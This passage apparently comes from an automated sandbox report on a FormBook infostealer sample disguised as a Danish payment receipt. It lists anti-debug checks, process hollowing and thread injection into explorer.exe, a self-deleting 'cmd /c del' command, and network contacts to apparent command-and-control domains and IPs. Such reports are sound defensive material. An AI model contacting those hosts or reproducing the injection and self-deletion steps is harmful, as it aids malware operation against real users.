          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00409B30 LdrLoadDll,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002B7310 SetUnhandledExceptionFilter,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002B6FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.217 80
          Source: C:\Windows\explorer.exeDomain query: www.bbyyn10.xyz
          Source: C:\Windows\explorer.exeDomain query: www.chimichael.com
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.176.30 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.45.211 80
          Source: C:\Windows\explorer.exeDomain query: www.inkedbreadcompany.com
          Source: C:\Windows\explorer.exeDomain query: www.malatirada.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.insularrofioa.xyz
          Source: C:\Windows\explorer.exeDomain query: www.bobazzing.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.186.238.101 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80
          Source: C:\Windows\explorer.exeNetwork Connect: 142.4.98.67 80
          Source: C:\Windows\explorer.exeDomain query: www.finansresultation.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.40.182 80
          Source: C:\Windows\explorer.exeDomain query: www.improvfilmproduction.com
          Source: C:\Windows\explorer.exeDomain query: www.rxgmarket.com
          Source: C:\Windows\explorer.exeDomain query: www.joystoreworld.com
          Source: C:\Windows\explorer.exeDomain query: www.tucows.website
          Source: C:\Windows\explorer.exeDomain query: www.olympiaapartment.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Betalingskvittering.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 2A0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Betalingskvittering.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Betalingskvittering.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Betalingskvittering.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Betalingskvittering.exeMemory written: C:\Users\user\Desktop\Betalingskvittering.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Betalingskvittering.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Betalingskvittering.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3440
          Source: C:\Users\user\Desktop\Betalingskvittering.exeProcess created: C:\Users\user\Desktop\Betalingskvittering.exe 'C:\Users\user\Desktop\Betalingskvittering.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Betalingskvittering.exe'
          Source: explorer.exe, 00000004.00000000.376258618.00000000083EB000.00000004.00000001.sdmp, cmd.exe, 00000007.00000002.615005852.0000000005410000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.388804308.0000000000EE0000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.615005852.0000000005410000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.388804308.0000000000EE0000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.615005852.0000000005410000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000004.00000000.388804308.0000000000EE0000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.615005852.0000000005410000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002C3C49 GetSystemTime,SystemTimeToFileTime,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,GetEncryptedFileVersionExt,DeleteFileA,CopyFileA,GetEncryptedFileVersionExt,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
